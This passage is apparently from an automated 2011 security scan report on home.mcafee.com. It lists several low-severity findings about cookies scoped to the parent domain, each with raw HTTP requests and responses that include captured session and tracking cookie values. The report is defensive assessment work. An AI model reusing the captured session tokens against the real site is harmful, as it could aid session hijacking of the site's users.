session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Location: http://home.mcafee.com/Store/Store9.aspx?
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:58 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:58 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lBounceURL=http://home.mcafee.com/store/default.aspx; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:58 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:58 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fstore%2fdefault.aspx&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV7
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:18:57 GMT
Content-Length: 0
Connection: close


13.16. http://home.mcafee.com/supportpages/privacyFeedback.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://home.mcafee.com
Path:   /supportpages/privacyFeedback.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /supportpages/privacyFeedback.aspx HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:19:04 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:19:04 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lBounceURL=http://home.mcafee.com/supportpages/privacyFeedback.aspx; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: pfb=; domain=mcafee.com; expires=Fri, 29-Apr-2011 22:19:04 GMT; path=/; HttpOnly
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:19:04 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:19:04 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsupportpages%2fprivacyFeedback.aspx&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV7
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:19:04 GMT
Content-Length: 18523
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en"
...[SNIP]...

13.17. http://home.mcafee.com/supportpages/purchasehelp.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://home.mcafee.com
Path:   /supportpages/purchasehelp.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /supportpages/purchasehelp.aspx HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:19:03 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:19:03 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:19:03 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:19:03 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV3
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:19:03 GMT
Content-Length: 6066
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><link rel="
...[SNIP]...

13.18. https://home.mcafee.com/ScriptResource.axd  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://home.mcafee.com
Path:   /ScriptResource.axd

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ScriptResource.axd HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:44 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:44 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
X-Powered-By: ASP.NET
MS: SJV1
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:18:44 GMT
Connection: close
Content-Length: 9425


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...

13.19. https://home.mcafee.com/Secure/Protected/Login.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://home.mcafee.com
Path:   /Secure/Protected/Login.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Secure/Protected/Login.aspx HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:21 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:21 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:21 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:21 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&piacct=l5hppVF9ZAZqvcqlqqTxbw%3d%3d&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV1
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:18:21 GMT
Content-Length: 52910
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...

13.20. https://home.mcafee.com/WebResource.axd  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://home.mcafee.com
Path:   /WebResource.axd

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /WebResource.axd HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:40 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:40 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
X-Powered-By: ASP.NET
MS: SJV8
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:18:40 GMT
Connection: close
Content-Length: 9425


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...

13.21. https://home.mcafee.com/WebServices/AccountWebSvc.asmx/js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://home.mcafee.com
Path:   /WebServices/AccountWebSvc.asmx/js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /WebServices/AccountWebSvc.asmx/js HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; 